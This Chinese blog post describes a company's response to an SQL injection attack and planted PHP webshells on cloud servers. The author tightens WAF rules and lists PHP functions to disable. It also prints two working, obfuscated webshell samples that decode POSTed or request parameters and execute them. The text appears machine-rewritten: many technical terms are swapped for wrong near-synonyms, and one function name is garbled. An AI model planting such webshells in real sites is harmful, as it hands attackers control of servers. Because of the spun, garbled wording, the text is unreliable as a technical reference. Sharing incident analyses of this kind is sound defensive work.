浅谈一次与sql注入 & webshell 的优美“邂逅”

引言

一波未平，一波又起。金融企业的业务实在是太引人耳目，何况我们企业的业处正处于风口之上（区块链金融），并且天天有大量现金交易，所以不晓得有多少躲在暗处不断在盯着你的系统，让你防不胜防，并且想方想法的找到冲破点，以达到的目的来获取非法利益。

俗话说：“道高一尺，魔高一丈”。系统和代码也可以这么了解，防的在好，总有破绽。系统和代码也没有绝对的平安。该来的总会来......

sql注入与“她”相遇

某一天，气候晴朗，心境舒服。“她”来了，打破了笔者的美妙时光。下午2点多钟，笔者和朋友在街的天使汇二楼极客咖啡加入某个云厂商的Kubernetes一场技术沙龙，正听得兴高采烈的时候，笔者的企业群里有个php开发忽然帖出一张图：

这个时候，群里翻腾了。没错，被SQL注入了，数据库的表被注入了字段，并且经检查后，发明这个库中的大局部表都被注入了这个字段。我的电脑没带在身边，真是焦急，马上跟总监注明题目重大性。因为我电脑不在身边， 只能把数据库账号授权（读写权限）给那个php开发，让他检查所有的表，把被注入的字段删除掉。并查看数据和其它表有没有被修改。好在发明急时，数据和业务都没有被遗失和损坏。

这里我要注明一下，我们的业务都在阿里云，项目是以php为主，并且开通了waf防火墙，只是waf上的防护措施比较宽松。笔者在平安方面的经验也比较欠缺，好在开通了阿里云的WAF，让笔者在排查和防护上也变得轻松和快捷。

此时，我已经在回家的路上，回到家中快速打开电脑。

调整waf战略

因为笔者也是刚接手工作，阿里云上的许多战略还没得到及时调整。所以才这么容易被攻进来。即然被注入了，确定要把源给揪出来。我也在次把所有的表都检查一遍，确认没题目后，在去调整waf战略，进入阿里云。

1、进入相干域名的防护配置，我们先来看下调整前的战略，如下图：

从上图可以看出，“Web利用防护”战略是宽松模式，其主要作用就是防护SQL注入、XSS跨站等常见Web利用，宽松模式下对业务的误报程度最低，但也容易漏过***。“歹意IP赏罚”也没启用。这么宽松的防护措施风险比较大。赶快先调整吧。

2、调整后的战略（若有多个域名，都调整过来），如下图：

防护战略调整过了，还需要把题目根源找到啊，这才是最重要的！！！

查找可疑文件

此时，php的项目源码散布在好几台服务器上，要是靠传统方式去排查，受个检查这些服务器的目录，各种能用的下令都用上了，是不是也挺费力费时的，还不晓得要查到啥时候。这个时候，阿里有项服务起到要害的作用了：“态势感知”，这个需要晋级为公司版本（费用不高，我们企业开通了一年，费用6000多块）。这就是用阿里的益处（不是打广告），的确让你省心。

1、进入“态势感知”查看一下，就立马发明了一堆异样行为，遍及在好几台服务器上如下图：

2、点几个异样行为进入看看，我就打开其中两个行为看一下，其它的行为也都差不多，如下图：

从下令行参数中可以看出相干目录有/Mode/Lite/ ，并且给出的解决方案是及时排查可疑目录下的信息并及时革除。笔者顺着给出的提醒在服务器上进行 find 相干目录，查找出目录所在途径，如下图：

顺藤摸瓜吧，列一下这个目录的文件：

从上图发明了有两个异样的php文件，目录属主也和其它文件不同，笔者打开代码仓库也进入雷同的目录进行比对，代码仓库中的确没有这两个文件。为了确认分明，把这两个文件down下来发给开发。开发说项目中没有这两个文件。把它down下来打开文件看看：

Content.class.php文件内容：

<?php @($_=base64_decode($_POST[1])).$_(hex2bin($_POST[2]))?>
}

这代码不就是被注入的表里的字段吗，上面这段代码大约意思为：把post请求的两个参数，一个用base64解密，一个用hex2bin转成16进制，然后拼接在一起，应当是把操纵数据库的语句加密传过来，然后解密，这样就不会被拦截掉。要是哪位博友以为解释的有误，一定要提出来。

Lite.class.php文件内容：

<?php if(isset($_REQUEST['error'])&&isset($_REQUEST['limit'])){
  $page = $_REQUEST['error'];
  $limit = $_REQUEST['limit'];
  $func = base64_decode(str_rot13(strrev($limit)));
  $func(base64_decode(str_rot13(strrev($page))));
  exit;

上面的代码其实和以前的那段代码有共性，反转字符串然后ROT13 编码，然后base64解码，最后按照 PHP 代码来盘算，至于base64_decode，str_rot13，strrev是为了绕过WAF等平安设施的过滤。

已经很显明了，就是由上面这些代码文件Content.class.php等文件给注入的。不用想了：rm -rf 吧。这个动态感知还是挺好用的，能迅速定位到风险目录，让你减少排查的工夫和精神。

为了保险起见，继续排查一下其它的目录是否也存在可疑文件，一定要排查洁净了，操纵一定要当心，也别误删，公然在同级目录下又发明一个，如下图：

还有一个，如下图：

和代码仓库、开发的对照，可以肯定这两个也是***传进来的可疑文件，我有一个习惯，删除文件以前喜好备份到当地。备份好这些可疑文件到当地之，都彻底革除掉。

虽然都革除掉了，waf防火墙也调整了，但是也没有绝对的平安，还需要把php这些惊险的函数禁用掉，比方禁用phpinfo、exec()、system()等：

phpinfo()
功能描述：输出 PHP 环境信息以及相干的模块、WEB 环境等信息。
惊险品级：中

passthru()
功能描述：允许施行一个外部程序并回显输出，相似于 exec()。
惊险品级：高

exec()
功能描述：允许施行一个外部程序（如 UNIX Shell 或 CMD 下令等）。
惊险品级：高

system()
功能描述：允许施行一个外部程序并回显输出，相似于 passthru()。
惊险品级：高

chroot()
功能描述：可转变目前 PHP 进程的工作根目录，仅当系统支撑 CLI 模式
PHP 时才能工作，且该函数不适用于 Windows 系统。
惊险品级：高

scandir()
功能描述：列出指定途径中的文件和目录。
惊险品级：中

chgrp()
功能描述：转变文件或目录所属的会员组。
惊险品级：高

chown()
功能描述：转变文件或目录的所有者。
惊险品级：高

shell_exec()
功能描述：通过 Shell 施行下令，并将施行效果作为字符串返回。
惊险品级：高

proc_open()
功能描述：施行一个下令并打开文件指针用于读取以及写入。
惊险品级：高

proc_get_status()
功能描述：获取运用 proc_open() 所打开进程的信息。
惊险品级：高

ini_alter()
功能描述：是 ini_set() 函数的一一般名函数，功能与 ini_set() 雷同。
具体参见 ini_set()。
惊险品级：高

ini_set()
功能描述：可用于修改、设置 PHP 环境配置参数。
惊险品级：高

ini_restore()
功能描述：可用于恢复 PHP 环境配置参数到其初始值。
惊险品级：高

dl()
功能描述：在 PHP 进交运行历程当中（而非启动时）加载一个 PHP 外部模块。
惊险品级：高

pfsockopen()
功能描述：创立一个 Internet 或 UNIX 域的 socket 耐久连贯。
惊险品级：高

symlink()
功能描述：在 UNIX 系统中创立一个符号链接。
惊险品级：高

popen()
功能描述：可通过 popen() 的参数通报一条下令，并对 popen() 所打开的文件进行施行。
惊险品级：高

putenv()
功能描述：用于在 PHP 运转时转变系统字符集环境。在低于 5.2.6 版本的 PHP 中，可应用该函数
修改系统字符集环境后，应用 sendmail 指令发送特别参数施行系统 SHELL 下令。
惊险品级：高

禁用要领如下：
打开/etc/php.ini文件，查找到 disable_functions ，增加需禁用的函数名，如下：
phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen

趁着这次事件，把其它服务器也一并排查一下吧，需要点耐心渐渐排查，***把这些可疑文件假装的非常好，绕过了waf墙，人的肉眼不细心看它都看不出来，所以还是要本人仔细一点干活。

需要声明一下：每个人的做事方式都不同，本文只是把笔者碰到的事件分享给大家，仅作为交换和学习。

名词解释

sql注入：

所谓SQL注入，就是通过把SQL下令插入到Web表单提交或输入域名或页面请求的查询字符串，终究达到诈骗服务器施行歹意的SQL下令。具体来说，它是应用现有利用程序，将（歹意的）SQL下令注入到后台数据库引擎施行的能力，它可以通过在Web表单中输入（歹意）SQL语句得到一个存在平安破绽的网站上的数据库，而不是按照设计者用意去施行SQL语句。 比方先前的许多影视网站泄露VIP用户密码大多就是通过WEB表单递交查询字符暴出的，这类表单特殊容易挨到SQL注入式***．

webshell：

webshell就是以asp、php、jsp或者cgi等网页文件情势存在的一种下令施行环境，也可以将其称做为一种网页后门。在了一个网站后，平常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以运用阅读器来访问asp或者php后门，得到一个下令施行环境，以达到控制网站服务器的目的。
顾名思义，“web”的含义是显然需要服务器开放web服务，“shell”的含义是取得对服务器某种程度上操纵权限。webshell常常被称为***者通过网站端口对网站服务器的某种程度上操纵的权限。因为webshell其大多是以动态脚本的情势涌现，也有人称之为网站的后门工具。

平安防范小结

归纳一下，主要有下列几点：
1.永远不要信任会员的输入。对会员的输入进行校验，可以通过正则表达式，或限定长度；对单引号和双"-"进行转换等。
2.永远不要运用动态拼装sql，可以运用参数化的sql或者直接运用存储历程进行数据查询存取。
3.永远不要运用治理员权限的数据库连贯，为每个利用运用独自的权限有限的数据库连贯。
4.不要把秘密信息直接寄存，加密或者hash掉密码和敏感的信息。
5.利用的异样信息应当给出尽可能少的提醒，最佳运用自定义的差错信息对原始差错信息进行包装。
6.sql注入的检测要领个别采取辅助软件或网站平台来检测，软件个别采纳sql注入检测工具jsky，网站平台就有亿思网站平安平台检测工具。MDCSOFT SCAN等。采纳MDCSOFT-IPS可以有效的防御SQL注入，XSS***等。

以上就是本文的全部内容，但愿对大家的学习有所帮忙，也但愿大家多多支撑我们。